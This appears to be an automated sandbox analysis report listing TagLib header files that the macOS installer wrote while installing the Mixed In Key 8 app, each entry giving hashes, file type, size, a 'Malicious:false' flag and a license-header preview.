                                                                                                    SHA-512:8A6026B367C49C5CB81069E7E30E1B38BB4BB0E954F307913BB3479EF7CDC0CEA74A747620A50AD606E2F95430C5F13261988D6F0F54A508C46F2105156B33E4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2012 by Michael Helmling. email : helmling@mathematik.uni-kl.de. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bsTVzw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):21347
                                                                                                    Entropy (8bit):4.523654126834453
                                                                                                    Encrypted:false
                                                                                                    MD5:DC27E728F62ABE8B52DFE02EE4288429
                                                                                                    SHA1:D9C6162ED75C4D6E5AAB8AB1AAD5C7304E462949
                                                                                                    SHA-256:752EB07329F719E3D35325703622A3E5169E45EAB6B4A43F8D57DECF60F4F220
                                                                                                    SHA-512:1428F0DB1FE657324EE4257CAF2D1AF6A8FF0C71B1CC18C53C877A11CD03CA3C97F9413C4CD9007D236ECC279F38E921C7A7C31A257EC38398BFCF9BEE4911ED
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_cI5plv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):3705
                                                                                                    Entropy (8bit):4.219968803127934
                                                                                                    Encrypted:false
                                                                                                    MD5:8542EA6A18C10FFC6E320C06BFB1818C
                                                                                                    SHA1:1966F14671A575A6DE21F39975989C4ACA4126BD
                                                                                                    SHA-256:AF936448C63034D6AB30B463F8E056C93B57729DBC983B7ED5BDBEA890C336E8
                                                                                                    SHA-512:0B87589083972692972C21A40E000CAEBEA814557608B869641A7D9D46CFAF92DBAEDC0170A4BBED54CE0C8A750A6516F7D31BE38B562555975E1459EA098F5C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_dFPXWh
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5519
                                                                                                    Entropy (8bit):4.3504257356582965
                                                                                                    Encrypted:false
                                                                                                    MD5:2FAB58B8024E2D9D579F03EB6BE8AD82
                                                                                                    SHA1:44191B1E9F187C364F4991F4EE71037E4038E71C
                                                                                                    SHA-256:93B894F2DB6EB31C03FF43ACCD192291CCFC04F7D682319D5A9088DA59C686DD
                                                                                                    SHA-512:8B703EC5784289970858DEBA2050590E704AFBF08847916F7BEFE12D7AE61704AF49063C0DFE77D5DD3C8EA4D6339BBE17A3C7C3FC8874A2B1DEA65CA47A4FA6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_dgRxvi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):6142
                                                                                                    Entropy (8bit):4.86951756844954
                                                                                                    Encrypted:false
                                                                                                    MD5:F318E6C96E7B62D7B1821CA9CF43F0CF
                                                                                                    SHA1:58B072DE5DECE03529D9E5A1F0CD9852EAA2661F
                                                                                                    SHA-256:1B8AC5B6306944D946C69E97ACBC54563D1C6A0CF7B774C5AB32AAB9AA0D6083
                                                                                                    SHA-512:345D3791219176D400068B5B3C6B60EF0643E63979650D7073D8A4641E328522C7B210BCC1B40964A65E8F0477845466F411EFAC0409C7C0312D07BA4EE72813
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: #ifndef TAGLIB_UNICODE_H.#define TAGLIB_UNICODE_H../*******************************************************************************. * *. * THIS FILE IS INCLUDED IN TAGLIB, BUT IS NOT COPYRIGHTED BY THE TAGLIB *. * AUTHORS, NOT PART OF THE TAGLIB API AND COULD GO AWAY AT ANY POINT IN TIME. *. * AS SUCH IT SHOULD BE CONSIERED FOR INTERNAL USE ONLY. *. * *. *******************************************************************************/..#ifndef DO_NOT_DOCUMENT // tell Doxygen not to document this header../*. * Copyright 2001 Unicode, Inc.. * . * Disclaimer. * . * This source code is provided as is by Unicode, Inc. No claims are. * made as to fitness for any particular purpose. No warranties of any. * kind are expressed or implied. The recipient agrees to determine. * applicability of information provided. If
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eiyJhD
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6273
                                                                                                    Entropy (8bit):4.5014784507988885
                                                                                                    Encrypted:false
                                                                                                    MD5:C82977A47F2AEA0E92A9666024EFB167
                                                                                                    SHA1:9D415308299D7EE147E3363F434288951F4B633D
                                                                                                    SHA-256:D62DD95AE41AB958ACD0C77100E36A0AA8818291A86DC75068CD0923A5A70575
                                                                                                    SHA-512:A19C82FED37022A4E95A122B8131652CBCFDFFE6543FD369EAF263C8BB42C0FEEDF174C079A8F7B956B46BECA7E73CF7DF2713A658628E1A462A41AB58BEE0AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_eqQ8rT
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5949
                                                                                                    Entropy (8bit):4.4046817844078126
                                                                                                    Encrypted:false
                                                                                                    MD5:D4547BD09245EFC25D574022D8EC9728
                                                                                                    SHA1:E083C2AB272170ABE752D6C2D926B5BC1C9815CA
                                                                                                    SHA-256:657BEC982D0A246689E6CCBE18C2704426F01FBE75FD4E5D74D38179A0635C9C
                                                                                                    SHA-512:7EFBC75B75CE056C64928A308C04E9FF0F2EF5C45CF69A6D4BA57AC7C9A0CBB9A3A5B7F3A0C8DA7ADA71ECA858E87645B5DF0BBBE9D01E4E174D242B76A9560E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org.. copyright : (C) 2006 by Aaron VonderHaar. email : avh4@users.sourceforge.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser Ge
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_gOxrRx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):3113
                                                                                                    Entropy (8bit):4.312991656744381
                                                                                                    Encrypted:false
                                                                                                    MD5:2AFB0D1F6D6A6DC02F3858724568E10B
                                                                                                    SHA1:3466B855F4C0272E622E5E2C059C261AF5011BD4
                                                                                                    SHA-256:EC0A540787EB2E33A9454F14D8E76A50A5EBB5BDC60B234B8B786034FD0E02C4
                                                                                                    SHA-512:397B79C5D0FE3950E5EC6CED7522F7E99624C1238C938FD15E94A367D74BCAB70E9024FDAFB4492E9BADF95AC8D36E9A9D2080300642051ECCAC4067B49D641F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_j4xgNu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):5269
                                                                                                    Entropy (8bit):4.282530748384306
                                                                                                    Encrypted:false
                                                                                                    MD5:2445B0A766043A90A74921E5778937AD
                                                                                                    SHA1:84A4C471BDF5CA42C9D7A32E960DFF3439307756
                                                                                                    SHA-256:85B25F4ACA713F0BE2FD7EC4FDEAAF991417CF76A6DE96AED2286D4DE4FF853E
                                                                                                    SHA-512:071E64C8269B7DF90E8B3A498CE150B1447C29B4C3F82455D382B4CF5CA199DD5C2838B195618405B82D91249D18C15F1D00189E51FD02CD3904D54138735F9D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2005-2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_jogQ5K
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):7087
                                                                                                    Entropy (8bit):4.337977863406877
                                                                                                    Encrypted:false
                                                                                                    MD5:E87176EC3810137E9CFA7DBDE5D6A08C
                                                                                                    SHA1:6D459F52F1AAFDB48E1530D8D0044C21EA9952D7
                                                                                                    SHA-256:737D1404C0698D0C6C9802EB7091249E7CB516AAD060C35A4A9388BEBCD3DEBE
                                                                                                    SHA-512:0975CA73AAF7C09F818C0642D61F5A9CE83FAA854C7F0DDD3B714EF3651F5316B24DAA1241AB7414935984D92D88EDC72C50AA42F476337BAA42A087319C0E15
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_k81phZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2704
                                                                                                    Entropy (8bit):4.746935736262327
                                                                                                    Encrypted:false
                                                                                                    MD5:ED9816BD305FBC82BC2B42986AD0F579
                                                                                                    SHA1:275EEC4715DE630CDE100EF37C44707E5F1AB230
                                                                                                    SHA-256:EB937EFD3B2EA112F79C2CE9842179010A5E9DC9AC27035DBA8B1A20CF85CE77
                                                                                                    SHA-512:E60582B8E0CA32A64DE72126F538A38D0BCC3E1FC172AD83DE9FCC6BD628B094C5EE11F9F0646619392C635866A2A1D396E73F53CA9580ECCE65DAD47A1A1324
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_kjQ5bd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):6659
                                                                                                    Entropy (8bit):4.4457204739322576
                                                                                                    Encrypted:false
                                                                                                    MD5:E39FE2DBC78B028E96B9B2F297AF3A36
                                                                                                    SHA1:B14B46DA16FA835837DDBEFF1B9DDC60E9A6C375
                                                                                                    SHA-256:7061F104B5CD2F7DEB15ACDAAEA9F2AA55D8E41C3DDA1952515C2AC7A43800D1
                                                                                                    SHA-512:5DE31E0AC9DEC642F7A1C37AE7E56D7B12EF2ECB4D4A9366997F895C9E3ACFA31F993079BDD202AF43B1F68E8D0A80F7D8F4E42305945A936830A80D38ACAEC2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_l5Nf6w
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4517
                                                                                                    Entropy (8bit):4.2993051515206036
                                                                                                    Encrypted:false
                                                                                                    MD5:2E00C3CB54C69BEA6FC4215921C96132
                                                                                                    SHA1:265679351E50B478631D2A785F7D3E9D12AC4A22
                                                                                                    SHA-256:4109AD23403338FB1E7D54DE568F38280413F407C9F5D960D754BC1CDE47ABD6
                                                                                                    SHA-512:0F6A9A84994D51F40DFB0A88B37C330CA2A7A15919E92738B8BFCAE06C77B347961618F17CF7738DCA26F459BF4521941823346D6F66AFB00BC0BF693DACFB13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_lzQsqn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4041
                                                                                                    Entropy (8bit):4.320679736541781
                                                                                                    Encrypted:false
                                                                                                    MD5:431ED75810E2C303CF358070FF09DDD8
                                                                                                    SHA1:7C900555F6A2679CC6E6887FAFA02B3B4844D17D
                                                                                                    SHA-256:29E2126FA618E6A94E97EEFBFD0F63A95E2D04C007A8D4C1463CEEDF2B6D7A11
                                                                                                    SHA-512:91BDD28CD51A1CFB75FCFD3C39C588A9B5208C41CECA4CD4162BDAEEAB012088E32DD5259FB0C4948E8D2055AAC9042E0635DB198980758684D0040E67B6BB96
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_myM1Uw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):7757
                                                                                                    Entropy (8bit):4.397981768682284
                                                                                                    Encrypted:false
                                                                                                    MD5:0DBB1F2897EB7196851B9E52473E3172
                                                                                                    SHA1:87433961CEF919B21D731E7EFAD1D17FE7C59512
                                                                                                    SHA-256:20257D4900283F1494215A8D41BDA1F3A4F0F1227771646693051AA97A751B66
                                                                                                    SHA-512:0312AC8ACBFC735A8104FB57FD188673C31B85B7F1E440FE66E86CF4E1B47A6F9434627578AE8D4037CEE71CDE1123C70ADB839A53AF8C389DC5D0E0ADC61A91
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. (original MPC implementation). ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_nlGOMr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5101
                                                                                                    Entropy (8bit):4.366160158086051
                                                                                                    Encrypted:false
                                                                                                    MD5:877E9CCD412CB78CC72E583D50EF3C1E
                                                                                                    SHA1:0B44FA96C817A055D8940BE860E650BA1732C6D4
                                                                                                    SHA-256:ECDB978E0EAFF853EEEB6B1A28AA6099B38D78DE20AE1A96CCBC07845807487F
                                                                                                    SHA-512:84F426F7B59EB0C94F1A22E10DDDF5520E47F85DE96046E793426F69AF171155A5B0A5F0BE7C1BC4C504FDD22054C3217438FA7875EC1102325CBD2380B2F80A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pIi97t
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):3607
                                                                                                    Entropy (8bit):4.266974725317283
                                                                                                    Encrypted:false
                                                                                                    MD5:15064C4A068F80E42FC60F9AA1C30EA5
                                                                                                    SHA1:C723031428B7450C2F21DE87A17A382213D80EB5
                                                                                                    SHA-256:132C80B42154FC51582CB68EAB00D8D174C8B05504EE769E9859F51BACBCDBED
                                                                                                    SHA-512:3115068D95BEA54EB9AAD6BE431F0B477768287C1C52DF59B21F522B446098ED054654894B176B546A1B3E2C78A1C9EC714AEBE3723E11CCA69EC843ECD67B82
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Serkan Kalyoncu. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pRzPIJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5387
                                                                                                    Entropy (8bit):4.433251112125085
                                                                                                    Encrypted:false
                                                                                                    MD5:852583E869F40233EF53DCFCF7311453
                                                                                                    SHA1:BCB9B380FC79A9A2D164C25E955C471B0A17A5BB
                                                                                                    SHA-256:B8ABF615AA954700BA9D3CD10742174BDC8EDC056E540FB188F0CA9A980F6FD8
                                                                                                    SHA-512:77F4387CD761ADA7D10469550BFA4C4B17D1137684FFBDF9EA921ED4278BD33F0FD7FE9C5F1DF4FEFE2BDEE05E449565437F8F66152946D4D25B4483EA4A3CA3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_pd16qW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7333
                                                                                                    Entropy (8bit):4.3829472365907085
                                                                                                    Encrypted:false
                                                                                                    MD5:4A65B644F88F6E54803EE0F280F4ACE7
                                                                                                    SHA1:F8A812640DC73363B37B1D9650C54EB70B16B2A7
                                                                                                    SHA-256:8340414A0897765CDE5B928DC3D91032A9401DEAAB84EBED7091B815CF7A59D8
                                                                                                    SHA-512:B8B385A5CFD7D8FB027A2FBC240A27EA4A96761D02EBE654C7BCB7C3DC757729AA56A007FF440AFE79D7F0E1DD49934F3800C0817125664870F985124653F9C3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
